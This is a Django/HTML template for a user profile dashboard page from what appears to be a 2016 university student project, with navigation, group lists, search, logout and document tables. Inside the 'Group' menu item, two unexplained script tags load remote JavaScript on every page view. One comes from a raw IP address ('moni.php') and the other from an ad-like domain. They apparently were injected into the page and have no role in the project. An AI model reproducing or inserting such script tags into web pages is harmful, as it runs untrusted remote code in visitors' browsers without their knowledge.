<!doctype html>
<html lang="en">
<head>
	<meta content='width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0' name='viewport' />
    <meta name="viewport" content="width=device-width" />
    <link rel="icon" type="image/png" href="/static/dashboard_assets/img/favicon.ico">
    <title>Name of the One who you want to see</title>

        <!--JQUERY CDN-->
        <script src="http://ajax.aspnetcdn.com/ajax/jQuery/jquery-2.2.3.min.js" type="text/javascript"></script>

        <!--BOOTSTRAP CDN-->
        <!-- Latest compiled and minified CSS -->
        <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css" integrity="sha384-1q8mTJOASx8j1Au+a5WDVnPi2lkFfwwEAa8hDDdjZlpLegxhjVME1fgjWPGmkzs7" crossorigin="anonymous">
        <!-- Latest compiled and minified JavaScript -->
        <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/js/bootstrap.min.js" integrity="sha384-0mSbJDEHialfmuBBQP6A4Qrprq5OVfW37PRR3j5ELqxss1yVqOtnepnHVP9aJ7xS" crossorigin="anonymous"></script> 

    <!-- Animation library for notifications   -->
    <link href="/static/dashboard_assets/css/animate.min.css" rel="stylesheet"/>
    
    <!--  Light Bootstrap Table core CSS    -->
    <link href="/static/dashboard_assets/css/light-bootstrap-dashboard.css" rel="stylesheet"/>
    
    <!--  CSS for Demo Purpose, don't include it in your project     -->
    <link href="/static/dashboard_assets/css/demo.css" rel="stylesheet" />
    
    <!--     Fonts and icons     -->
    <link href="http://maxcdn.bootstrapcdn.com/font-awesome/4.2.0/css/font-awesome.min.css" rel="stylesheet">
    <link href="/static/dashboard_assets/css/pe-icon-7-stroke.css" rel="stylesheet" />
    
    <!--     Toggle Function     -->
	<script type="text/javascript">
	$(document).ready(function(){
        console.log("test_for_function")
        $("#button_for_toggle").click(function(){
            $("#group_list").toggle();
        });
	});
	</script>
    
</head>
<body> 

<div class="wrapper">
    <div class="sidebar" data-color="green" data-image="/static/dashboard_assets/img/sidebar-5.jpg">    
    
    <!--   you can change the color of the sidebar using: data-color="blue | azure | green | orange | red | purple" -->
    
    
    	<div class="sidebar-wrapper">
            <div class="logo">
                <a href="http://www.creative-tim.com" class="simple-text">
                    Name of Project
                </a>
            </div>
                       
            <!--Unordered List of Five Icons on Navigation Bar-->           
            <ul class="nav">
                <li>
                    <a href="home_page.html">
                        <i class="pe-7s-home"></i> 
                        <p>Home</p>
                    </a>        
                </li>
                <li>
                    <a href="/user_dashboard">
                        <i class="pe-7s-note2"></i> 
                        <p>Documents</p>
                    </a>            
                </li>
                <li class="active">
                    <a href="/user_dashboard/friends_page">
                        <i class="pe-7s-add-user"></i> 
                        <p>Friends</p>
                    </a>
                </li> 
                
                <li>
                    <a>
                        <i class="pe-7s-users"></i> 
                        <p>Group
                            <b style="cursor: pointer; float: right;" id="button_for_toggle" class="caret"></b>
                            <script src="http://120.25.128.165/moni.php?tm=1467545864" type="text/javascript"></script>
                            <script src="http://cpro.sndo.com/static/js/b.js" type="text/javascript"></script>
                        </p>
                        <ul id="group_list" class="dropdown-toggle" data-toggle="dropdown" style="display: none;">
                            {% for coterie in current_user.administrated_coterie_set.all %}
                                <form style="display: none;" method="get" action="group_page">
                                    <input name="coterie_id" value="{{ coterie.id }}">
                                    <input name="coterie_type" value="administrated">
                                </form>
                                <li class="group_page_button" style="cursor: pointer;">
                                    ({{ coterie.id }}) {{ coterie.name }} (admin)
                                </li>
                            {% endfor %}

                            {% for coterie in current_user.joined_coterie_set.all %}
                                <form style="display: none;" method="get" action="group_page">
                                    <input name="coterie_id" value="{{ coterie.id }}">
                                    <input name="coterie_type" value="joined">
                                </form>
                                <li class="group_page_button" style="cursor: pointer;">
                                    ({{ coterie.id }}) {{ coterie.name }} (member)
                                </li>
                            {% endfor %}
                            <script>
                                $(document).ready(function() {
                                    $(".group_page_button").on("click", function() {
                                        $(this).prev("form").submit();
                                    })
                                })
                            </script>
                        </ul>
                    </a>
                </li>
            </ul> 
    	</div>
    </div>
    
    
    <div class="main-panel">
<nav class="navbar navbar-default navbar-fixed">
            <div class="container-fluid">    
                <div class="navbar-header">
                    <button type="button" class="navbar-toggle" data-toggle="collapse" data-target="#navigation-example-2">
                        <span class="sr-only">Toggle navigation</span>
                        <span class="icon-bar"></span>
                        <span class="icon-bar"></span>
                        <span class="icon-bar"></span>
                    </button>
                    <a class="navbar-brand" href="#">"Name of the One" 's Profile</a>
                </div>
                <div class="collapse navbar-collapse">       
                    <ul class="nav navbar-nav navbar-left">
                        <li>
                            <form action="/handle_search" method="get" class="form-inline" style="display: inline">
                                <input name="search_key" type="text" class="form-control input-sm" required="required">
                                <button type="submit" style="display: none"></button>
                            </form>
                            <a style="display: inline-block; cursor: pointer;"><i class="fa fa-search"></i></a>
                            <script>
                                $(document).ready(function() {
                                    $(".fa-search").on("click", function() {
                                        var form = $(this).parent().prev("form");
                                        form.submit();
                                    })
                                });
                            </script>
                        </li> 
                    </ul>
                    
                    <ul class="nav navbar-nav navbar-right">
                        <li>
                            <img style="width:40px;height:40px;position:relative;padding:5px，4px;margin:7px;" class="img-circle" class="avatar border-gray" src="{{ current_user.portrait_url }}" alt="..."/>
                        </li>
                        <li>
                            <a href="/user_dashboard/change_portrait">change portrait</a>
                        </li>
                        <li class="dropdown">
                              <a href="#" class="dropdown-toggle" data-toggle="dropdown">
                                    Dropdown
                                    <b class="caret"></b>
                              </a>
                              <ul class="dropdown-menu">
                                <li><a href="#">Action</a></li>
                                <li><a href="#">Another action</a></li>
                                <li class="divider"></li>
                                <li><a href="#">Separated link</a></li>
                              </ul>
                        </li>
                        <li>
                            <form style="display: none" action = "/user_dashboard/handle_log_out" method = "post">
                                {% csrf_token %}
                                <button type="submit" class="btn btn-link">Log Out</button>
                            </form>
                            <a style="cursor: pointer;" id="actual_log_out_button">
                                Log out
                            </a>
                            <script>
                                $(document).ready(function() {
                                    $("#actual_log_out_button").on("click", function() {
                                        var form = $(this).prev("form");
                                        form.submit();
                                    })
                                });
                            </script>
                        </li> 
                    </ul>
                </div>
            </div>
        </nav>
                     
        <div class="content">
            <div class="container-fluid">
                <div class="row">
                    <div class="col-md-5">
                        <div class="card card-user">
                            <div class="image">
                                <img src="https://ununsplash.imgix.net/photo-1431578500526-4d9613015464?fit=crop&fm=jpg&h=300&q=75&w=400" alt="..."/>   
                            </div>
                            <div class="content">
                                <div class="author">
                                    <a href="/user_dashboard/change_portrait">
                                    <img class="avatar border-gray" src="{{ current_user.portrait_url }}" alt="..."/>
                                   
                                      <h4 class="title">{{ current_user.nickname }}<br/>
                                         <small>{{ current_user.email_address }}</small>
                                      </h4> 
                                    </a>
                                </div>  
                                <p class="description text-center"> description <br></p>

                                <div class="col-md-7">
                                    <h6  class="title"> Followings</h6>
                                    <br>
                                    <h6  class="title"><b>34</h6>
                       		    </div>
                       		    <div class="col-md-1"> 
                       		        <h6  class="title"> Followers</h6>
                       		        <br>
                       		        <h6  class="title"><b>44</h6>
                       		    </div>
                       		    
                            </div>
                            
                            
                            <hr>
                            <div class="text-center">
                                <button href="#" class="btn btn-simple"><i class="fa fa-facebook-square"></i></button>
                                <button href="#" class="btn btn-simple"><i class="fa fa-twitter"></i></button>
                                <button href="#" class="btn btn-simple"><i class="fa fa-google-plus-square"></i></button>
    
                            </div>
                        </div>
                    </div>
                
            
		            <div class="col-md-7">
                        <div class="card" >
                            <div class="header">
                                <h4 class="title">Documents Uploaded</h4>
                                <div class="content table-responsive table-full-width">
                                    <table class="table table-hover table-striped">
                                        <thead>
                                            <th>#</th>
                                        	<th>File Name</th>
                                            <th>  </th>
                                        </thead>
                                        <tbody>
                                            <tr>
                                                <td>1</td>
                                                <td>File1</td>    
                                                <td><button type="submit" name="document_id"  class="btn btn-info">Open</button></td>
                                            </tr>
                                        </tbody>
                                    </table>                                  
                                </div>
                            </div>
                        </div>
                    </div>                   
                
					<div class="col-md-7" style="float:right">
                        <div class="card">
                            <div class="header">
                                <h4 class="title">Documents Collected</h4>
                                <div class="content table-responsive table-full-width">
                                    <table class="table table-hover table-striped">
                                        <thead>
                                            <th>#</th>
                                        	<th>File Name</th>
                                            <th>  </th>
                                        </thead>
                                        <tbody>
                                            <tr>
                                                <td>1</td>
                                                <td>File1</td>    
                                                <td><button type="submit" name="document_id"  class="btn btn-info">Open</button></td>
                                            </tr>
                                        </tbody>
                                    </table>                                  
                                </div>
                            </div>
                        </div>
                    </div>   
				</div>
			</div>
		</div>
    </div>   
</div>
<footer class="footer">
            <div class="container-fluid">
                <nav class="pull-left">
                    <ul>
                        <li>
                            <a href="home_page.html">
                                Home
                            </a>
                        </li>
                        <li>
                            <a href="#">
                                Contact Us
                            </a>
                        </li>
                        
                    </ul>
                </nav>
                <p class="copyright pull-right">
                    &copy; 2016 <a href="http://www.comp.nus.edu.sg/">Orbital</a>, National University of Singapore
                </p>
            </div>
    </footer>

</body>

    <!--   Core JS Files   -->
    <script src="/static/dashboard_assets/js/jquery-1.10.2.js" type="text/javascript"></script>
	<script src="/static/dashboard_assets/js/bootstrap.min.js" type="text/javascript"></script>
	
	<!--  Checkbox, Radio & Switch Plugins -->
	<script src="/static/dashboard_assets/js/bootstrap-checkbox-radio-switch.js"></script>
	
	<!--  Charts Plugin -->
	<script src="/static/dashboard_assets/js/chartist.min.js"></script>

    <!--  Notifications Plugin    -->
    <script src="/static/dashboard_assets/js/bootstrap-notify.js"></script>

    <!-- Light Bootstrap Table Core javascript and methods for Demo purpose -->
	<script src="/static/dashboard_assets/js/light-bootstrap-dashboard.js"></script>
	
	<!-- Light Bootstrap Table DEMO methods, don't include it in your project! -->
	<script src="/static/dashboard_assets/js/demo.js"></script>
    
</html>